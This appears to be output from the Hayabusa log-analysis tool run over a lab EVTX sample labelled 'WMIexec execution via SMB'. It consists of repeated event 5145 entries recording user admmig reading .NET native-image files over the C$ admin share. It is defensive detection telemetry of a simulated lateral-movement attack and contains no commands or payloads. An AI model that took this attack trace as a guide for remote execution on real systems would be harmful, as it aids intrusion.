+2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462#\003de8140f5201b90706bed8c0b34d9a  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17#\8b98eff35de01ce97f419f50f85f6123  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment\53494598e1b6d05a1c7e3020cc4e9106  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Design  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Design\52a567b78cdfcd6f0926ba88bd575776  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Device  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Device\7270490235668fa0578aec716a28ce87  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2#\54c0c8fb72275b54709f09380c489b31  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5#\8f83846bacd706e939a5ed0f8b5e3a25  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#\8f81b927dcc93ba9ce82d9b8a45d3ee6  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252#\37cc106c66bc77ec23840bde30a2b4ad  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\ddb52221ad0200b7c2e0a308e47d5c7c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic\93aa8a60d293a05752aca14646afe6d2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\65b4d38e24dfdd935b19ba1de243c244  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.616 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377#\20e180f5a613fa6fc6d2734676e45df9  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff#\c44a74a8e4b895c50ca0a52e97d6428a  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel\15e0783372e02bd437cab8ac76420124  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8#\f7a43000e540605d6e0e171da4c2f1d4  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5#\d72f9f8f53d2cae7691f333739a06f37  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log\dbe5b3f92de7a1dc3900640c1907d600  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\4c22f9b9fda7e935d191dafdc77d9b1f  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb#\f16e228634f247a35562db6ee33649f3  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Management  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Management\d1e6b39e15536aaa5fb9b1cacf8b18aa  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging\0a331cd9fc9df7d44e898baf51e9e09e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net\61ed18221f09c6ff1b6071ff5a269d08  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8#\4a545096f3372d1b7307ee8849058910  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\5ba9e9e2d2253e30f3f28e12016e441d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics\8e945b32dd6b4b00c900f6c01c0f3c62  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing\0f95ad97e3260801c998976fb3a0e0e1  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498#\4febdd9160ebfd86d00365dbdaca9054  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
